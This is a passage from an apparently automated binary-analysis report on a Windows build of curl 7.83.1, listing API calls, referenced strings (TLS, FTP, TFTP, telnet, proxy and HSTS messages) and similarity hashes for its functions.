                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,?,00000000,00000000,?,?,?), ref: 00E44DDA
                                      • Part of subcall function 00E1DB77: recv.WS2_32(?,?,?,00000000), ref: 00E1DB81
                                      • Part of subcall function 00E1DB77: WSAGetLastError.WS2_32(?,?,?,00000000), ref: 00E1DB8E
                                    Strings
                                    • schannel: %s, xrefs: 00E44FC7
                                    • schannel: next InitializeSecurityContext failed: %s, xrefs: 00E44FA8, 00E44FF8
                                    • SSL: public key does not match pinned public key, xrefs: 00E450BE
                                    • schannel: failed to send next handshake data: sent %zd of %lu bytes, xrefs: 00E4501F
                                    • schannel: failed to receive handshake, SSL/TLS connection failed, xrefs: 00E44F1B
                                    • schannel: SNI or certificate check failed: %s, xrefs: 00E44FE9
                                    • schannel: unable to re-allocate memory, xrefs: 00E44C41
                                    • schannel: unable to allocate memory, xrefs: 00E45122
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: malloc$ErrorLastfreereallocrecv
                                    • String ID: SSL: public key does not match pinned public key$schannel: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                    • API String ID: 3337821324-3713536417
                                    • Opcode ID: d3f924a0f9a660375adf28e43da5f6be58b98d320b93b3fef516d4dcbcabf5a1
                                    • Instruction ID: feed681630cff2723926ffeb3d5315dc69e0becf0bd4c12b23559b6825dfcd5a
                                    • Opcode Fuzzy Hash: d3f924a0f9a660375adf28e43da5f6be58b98d320b93b3fef516d4dcbcabf5a1
                                    • Instruction Fuzzy Hash: F6F15AB1A006148FDB28CF25EC85BE9B7B5AF48314F1451EAD809BB291DB709E84CF80
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FDDF
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FE73
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FE95
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FEA8
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FF51
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FF76
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2FF89
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E300F0
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E300FD
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E301FB
                                    Strings
                                    • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 00E2FE1B
                                    • ** Resuming transfer from byte position %I64d, xrefs: 00E2FE08
                                    • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 00E301E2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$fflush
                                    • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                                    • API String ID: 1893817590-664487449
                                    • Opcode ID: 567c7858514f9567e6957d90866e78b483e64978fb8b63ca6f865e64224808e0
                                    • Instruction ID: bc29bbf92d2a70b8770845854203543714511ea48eeba0bf65fab6b1cc814296
                                    • Opcode Fuzzy Hash: 567c7858514f9567e6957d90866e78b483e64978fb8b63ca6f865e64224808e0
                                    • Instruction Fuzzy Hash: CCD15571E04B18AEEB258B64CD81BAABBBAEF48304F10556DE95EB3251DB353D40CF10
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E2EEE5
                                    Strings
                                    • +, xrefs: 00E2F055
                                    • *, xrefs: 00E2F08B
                                    • RESOLVE %s:%d is wildcard, enabling wildcard checks, xrefs: 00E2F0AA
                                    • Added %s:%d:%s to DNS cache%s, xrefs: 00E2F07D
                                    • RESOLVE %s:%d is - old addresses discarded, xrefs: 00E2EFEE
                                    • Couldn't parse CURLOPT_RESOLVE entry '%s', xrefs: 00E2F121
                                    • Couldn't parse CURLOPT_RESOLVE removal entry '%s', xrefs: 00E2EDAD
                                    • Resolve address '%s' found illegal, xrefs: 00E2F105
                                    • (non-permanent), xrefs: 00E2F05C
                                    • %255[^:]:%d, xrefs: 00E2ED98
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr
                                    • String ID: (non-permanent)$%255[^:]:%d$*$+$Added %s:%d:%s to DNS cache%s$Couldn't parse CURLOPT_RESOLVE entry '%s'$Couldn't parse CURLOPT_RESOLVE removal entry '%s'$RESOLVE %s:%d is - old addresses discarded$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal
                                    • API String ID: 601868998-1491845622
                                    • Opcode ID: c6ad37e577fb1731fc71f00ad66880cab47d30bd3d5cdda5f044716b9810fe12
                                    • Instruction ID: d676ba72cc4c7499151b4dc01d41a01d13cf5d0d3fa4ea86fb153d6b7769434d
                                    • Opcode Fuzzy Hash: c6ad37e577fb1731fc71f00ad66880cab47d30bd3d5cdda5f044716b9810fe12
                                    • Instruction Fuzzy Hash: 56B10631A046299FDF359B24EC85BEEB7B9AF85308F1410B9E04976282DB715E85CF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: %%25%s]$%25$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$0)$0)$P)$T)$X)$file$file://%s%s%s$https
                                    • API String ID: 0-525504209
                                    • Opcode ID: 852bce58a4ecdaefd8e4393d78bf1644500ee20da084c838d2635f96834022b4
                                    • Instruction ID: 87ef4ac430e88959afc6a43dc319e5cf016c2deebbedbd38db090d8953191047
                                    • Opcode Fuzzy Hash: 852bce58a4ecdaefd8e4393d78bf1644500ee20da084c838d2635f96834022b4
                                    • Instruction Fuzzy Hash: 9702CE31E00616EFDB258F68D8407EEBBF1AF88754F14A069E925BB291D7709C84CB90
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E15A87), ref: 00E29806
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E15A87), ref: 00E2983D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E15A87), ref: 00E2985F
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E2986B
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00E65674,00000000,00000002,?,00E15A87), ref: 00E29884
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(../,00000000,00000003), ref: 00E29899
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E299D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: free$strncmp$___from_strstr_to_strchrmalloc
                                    • String ID: ../$/..$/../$/./
                                    • API String ID: 11556461-456519384
                                    • Opcode ID: 30f0c090a2fb7fd80bc372e60042ea6ee881177022ba3a529d91d3826c593445
                                    • Instruction ID: 7b96d0aaf7663ebaf3f999aea1c32971b5dff5c160a4036067c417192463d01d
                                    • Opcode Fuzzy Hash: 30f0c090a2fb7fd80bc372e60042ea6ee881177022ba3a529d91d3826c593445
                                    • Instruction Fuzzy Hash: EA517C22B082629FDB251B29BC10779FFA59FD6374F28306ED4C6B7257D6A04C85C750
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3D359
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3D36E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3D3C0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3D405
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3D58F
                                    Strings
                                    • Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 00E3D696
                                    • No data was received, xrefs: 00E3D709
                                    • server did not report OK, got %d, xrefs: 00E3D5FB
                                    • Remembering we are in dir "%s", xrefs: 00E3D3D0
                                    • ABOR, xrefs: 00E3D445
                                    • Received only partial file: %I64d bytes, xrefs: 00E3D71F
                                    • Failure sending ABOR command: %s, xrefs: 00E3D469
                                    • control connection looks dead, xrefs: 00E3D553
                                    • Exceeded storage allocation, xrefs: 00E3D60E
                                    • partial download completed, closing connection, xrefs: 00E3D5BA
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Similarity
                                    • API ID: free
                                    • String ID: ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
                                    • API String ID: 1294909896-265991785
                                    APIs
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A0C3
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0CB
                                    • __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0DD
                                    • __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 00E1A0EC
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1A0F6
                                    • _strrchr.LIBCMT ref: 00E1A142
                                    • _strrchr.LIBCMT ref: 00E1A15C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A173
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A180
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A188
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A193
                                    Similarity
                                    • API ID: ErrorLast_errno$_strrchr$__sys_errlist__sys_nerrstrncpy
                                    • String ID: 0kv@qv@/lv$Unknown error %d (%#x)
                                    • API String ID: 3225659327-2262358793
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E241E7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E241FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2422D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24265
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24291
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E242D5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24311
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E243B3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24420
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24432
                                    Similarity
                                    • API ID: free
                                    • String ID: NO_PROXY$Uses proxy env variable %s == '%s'$Xf$memory shortage$no_proxy
                                    • API String ID: 1294909896-3033572779
                                    APIs
                                      • Part of subcall function 00E10DCE: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10E08
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000001F), ref: 00E3EF55
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3F0E0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3F0F5
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E03167), ref: 00E10E2C
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10E41
                                    Similarity
                                    • API ID: free$strncpy
                                    • String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$1$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
                                    • API String ID: 526250031-1116758244
                                    Similarity
                                    • API ID:
                                    • String ID: ACCT rejected by server: %03d$AUTH %s$CCC$Entry path is '%s'$Failed to clear the command channel (CCC)$Got a %03d ftp-server response when 220 was expected$PROT %c$SYST$unsupported parameter to CURLOPT_FTPSSLAUTH: %d
                                    • API String ID: 0-499900516
                                    APIs
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 00E015E1
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E015F9
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 00E01692
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?,?,?), ref: 00E016A0
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 00E016AC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E01780
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,00000001,?,?,%.*s:,00000000,?), ref: 00E018A3
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000001,?), ref: 00E018B7
                                    Similarity
                                    • API ID: fwrite$fflush$fputcfree
                                    • String ID: %.*s:$Content-disposition:$etag:$filename=
                                    • API String ID: 697768202-2097661518
                                    APIs
                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 00E380F9
                                    • sendto.WS2_32(?,?,?,00000000,?,?), ref: 00E38193
                                    • WSAGetLastError.WS2_32(?,?,00000004,?,00000000), ref: 00E381A2
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000004,?,00000000), ref: 00E381D1
                                    Strings
                                    • tftp_tx: giving up waiting for block %d ack, xrefs: 00E3816A
                                    • ;y, xrefs: 00E38336
                                    • Received ACK for block %d, expecting %d, xrefs: 00E38149
                                    • Timeout waiting for block %d ACK. Retries = %d, xrefs: 00E3804D
                                    • tftp_tx: internal error, event: %i, xrefs: 00E38028
                                    Similarity
                                    • API ID: sendto$ErrorLast_time64
                                    • String ID: ;y$Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                                    • API String ID: 3931062552-1033658319
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E09DCF
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E09E7A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09F01
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09F0F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09F5B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E09F70
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09F9B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09FAA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09FC5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09FD9
                                    Similarity
                                    • API ID: free$_strdup
                                    • String ID: out of memory$k%
                                    • API String ID: 2653869212-351869995
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E14F5C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14FD2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14FE4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14FF6
                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E62984,00000000,00000000,?), ref: 00E15039
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E15055
                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,00E62984,00000000,00000000,?), ref: 00E15082
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1509A
                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(E[,00E62984,00000000,00000000,?), ref: 00E150C3
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E150DB
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$freestrcspn
                                    • String ID: $E[
                                    • API String ID: 2030676775-918557827
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E02AC3
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02ADE
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E57348), ref: 00E02AFC
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E57348), ref: 00E02B19
                                    • _mkdir.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000), ref: 00E02B9F
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E02BAA
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E02BB5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E02BD0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02BDB
                                    Similarity
                                    • API ID: _errnofreestrtok$_mkdir_strdupmalloc
                                    • String ID: %s%s$0kv@qv@/lv
                                    • API String ID: 2356461126-1252674071
                                    APIs
                                      • Part of subcall function 00E120F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00E08A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00E12101
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0(00E574AB), ref: 00E08AC7
                                    • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,00000000,00000004,Function_00008A20), ref: 00E08B1A
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0(00E574AB), ref: 00E08B43
                                    Similarity
                                    • API ID: puts$__acrt_iob_funcqsort
                                    • String ID: %s$%s $2022-05-13$7.83.1$Features:$Protocols: $Release-Date: %s$WARNING: curl and libcurl versions do not match. Functionality may be affected.$curl 7.83.1 (Windows) %s
                                    • API String ID: 619265888-3826092985
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E035E5
                                    • CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00E035FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0360D
                                    • GetFileTime.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,?), ref: 00E03621
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E03666
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E03688
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E03690
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E0369B
                                    Strings
                                    • Failed to get filetime: underflow, xrefs: 00E03646
                                    • Failed to get filetime: GetFileTime failed: GetLastError %u, xrefs: 00E03679
                                    • Failed to get filetime: CreateFile failed: GetLastError %u, xrefs: 00E036A2
                                    Similarity
                                    • API ID: ErrorFileLast$CloseCreateHandleTimeUnothrow_t@std@@@__ehfuncinfo$??2@_strdupfree
                                    • String ID: Failed to get filetime: CreateFile failed: GetLastError %u$Failed to get filetime: GetFileTime failed: GetLastError %u$Failed to get filetime: underflow
                                    • API String ID: 862977939-2112902429
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2473C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24755
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24772
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2479C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24874
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E248C3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E248D7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E248F3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2495C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: free
                                    • String ID: %s%s.netrc$%s%s_netrc$Couldn't find host %s in the %s file; using defaults$HOME
                                    • API String ID: 1294909896-3314400472
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2346D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E234FF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E235A5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E235E8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E23637
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00E2381E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: free$strtoul
                                    • String ID: %s://%s$Switched from HTTP to HTTPS due to HSTS => %s$file$http$https
                                    • API String ID: 961130014-588811053
                                    APIs
                                    • send.WS2_32(?,?,00000006,00000000), ref: 00E3F340
                                    • WSAGetLastError.WS2_32 ref: 00E3F34A
                                    • send.WS2_32(?,?,?,00000000), ref: 00E3F3E5
                                    • WSAGetLastError.WS2_32 ref: 00E3F3EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: ErrorLastsend
                                    • String ID: %127[^,]%1[,]%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s$%c%s%c%s$Sending data failed (%d)
                                    • API String ID: 1802528911-3533120981
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E31902
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E31913
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,?,?,00E2A14F,?), ref: 00E31AC8
                                      • Part of subcall function 00E1D126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1D13A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrfree
                                    • String ID: %s$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:
                                    • API String ID: 653773606-2985882615
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,00000001,00000000,00000000), ref: 00E02E50
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000002), ref: 00E02E67
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000103,00000001,00000000,00000000), ref: 00E02EB2
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E02FA9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: strncpy$_strdupmalloc
                                    • String ID: AUX$CLOCK$$COM$CON$LPT$NUL$PRN
                                    • API String ID: 3833483438-925842913
                                    APIs
                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 00E37E69
                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 00E37ECD
                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 00E37F6D
                                    • WSAGetLastError.WS2_32(?,?,00000000), ref: 00E37F78
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,00000000), ref: 00E37FBE
                                    Strings
                                    • uy, xrefs: 00E37FD9
                                    • Received unexpected DATA packet block %d, expecting block %d, xrefs: 00E37FC9
                                    • Timeout waiting for block %d ACK. Retries = %d, xrefs: 00E37DC3
                                    • tftp_rx: internal error, xrefs: 00E37D97
                                    • Received last DATA packet block %d again., xrefs: 00E37F0D
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: sendto$ErrorLast_time64
                                    • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error$uy
                                    • API String ID: 3931062552-606568267
                                    APIs
                                    • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 00E10B6D
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E10B74
                                    • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,00000000,00000002,?), ref: 00E10C07
                                    • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000001,?), ref: 00E10C15
                                    • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000020,?,?,00000001,?), ref: 00E10C23
                                    • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00E10C31
                                    • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00E10C3D
                                    • RtlVerifyVersionInfo.NTDLL(?,?,00000008,00000001), ref: 00E10C5E
                                    • VerifyVersionInfoW.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-1(?,0000003B,00000000,?,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00E10C68
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: ConditionMask$InfoVerifyVersion$AddressHandleModuleProc
                                    • String ID: RtlVerifyVersionInfo$ntdll
                                    • API String ID: 574519269-1699696460
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed,?,?,?,?,00000000), ref: 00E0E483
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: fputs
                                    • String ID: %-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s$%3I64d$--:--:--$DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed$hv
                                    • API String ID: 1795875747-1852112861
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E17728
                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 00E177EA
                                    • WSAEventSelect.WS2_32(?,?,00000000), ref: 00E1781C
                                    • WSAWaitForMultipleEvents.WS2_32(00000001,000000DC,00000000,000003E8,00000000,00000000,00000000,00000000), ref: 00E17879
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E178B1
                                    • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00E178EE
                                    • WSAEventSelect.WS2_32(?,?,00000000), ref: 00E17900
                                    • WSAResetEvent.WS2_32(?), ref: 00E17925
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E17948
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: Event$EventsSelectfree$EnumMultipleNetworkResetWaitmallocsend
                                    • String ID: 2
